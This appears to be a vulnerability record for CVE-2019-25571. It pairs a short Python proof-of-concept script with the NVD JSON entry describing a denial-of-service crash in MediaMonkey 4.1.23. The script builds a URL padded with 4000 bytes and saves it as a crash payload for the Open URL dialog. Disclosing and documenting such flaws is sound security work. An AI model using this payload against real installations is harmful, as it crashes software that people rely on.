CVE-2019-25571

import os # PoC for CVE-2019-25571 # This script demonstrates how to generate a malicious URL string # that can trigger a Denial of Service in MediaMonkey 4.1.23. def generate_malicious_url(): # Base URL simulating a valid resource base_url = "http://example.com/song.mp3" # Buffer size to trigger the crash (4000 bytes as per description) buffer_size = 4000 # Creating the payload with repeated characters payload = "A" * buffer_size # Appending payload to the URL malicious_url = base_url + payload return malicious_url if __name__ == "__main__": exploit_url = generate_malicious_url() # In a real attack scenario, this URL would be passed to the # MediaMonkey application via the "File > Open URL" dialog. print(f"Generated Malicious URL Length: {len(exploit_url)}") print(f"Payload Preview: {exploit_url[:50]}...") # Save to file for reference with open("cve_2019_25571_poc.txt", "w") as f: f.write(exploit_url) print("Payload saved to cve_2019_25571_poc.txt")

{"cve": {"id": "CVE-2019-25571", "sourceIdentifier": "[email protected]", "published": "2026-03-21T13:16:21.017", "lastModified": "2026-03-24T20:41:40.150", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MediaMonkey 4.1.23 contains a denial of service vulnerability that allows local attackers to crash the application by opening a specially crafted MP3 file containing an excessively long URL string. Attackers can create a malicious MP3 file with a buffer containing 4000 bytes of data appended to a URL, which causes the application to crash when the file is opened through the File > Open URL dialog."}, {"lang": "es", "value": "MediaMonkey 4.1.23 contiene una vulnerabilidad de denegación de servicio que permite a atacantes locales colapsar la aplicación al abrir un archivo MP3 especialmente diseñado que contiene una cadena de URL excesivamente larga. Los atacantes pueden crear un archivo MP3 malicioso con un búfer que contiene 4000 bytes de datos adjuntos a una URL, lo que hace que la aplicación colapse cuando el archivo se abre a través del diálogo Archivo > Abrir URL."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-226"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ventismedia:mediamonkey:4.1.23.1881:*:*:*:*:windows:*:*", "matchCriteriaId": "9775D85A-1A25-482E-AB2D-B40E37061C2E"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/46378", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.mediamonkey.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.mediamonkey.com/sw/MediaMonkey_4.1.23.1881.exe", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/mediamonkey-denial-of-service-via-malformed-url", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}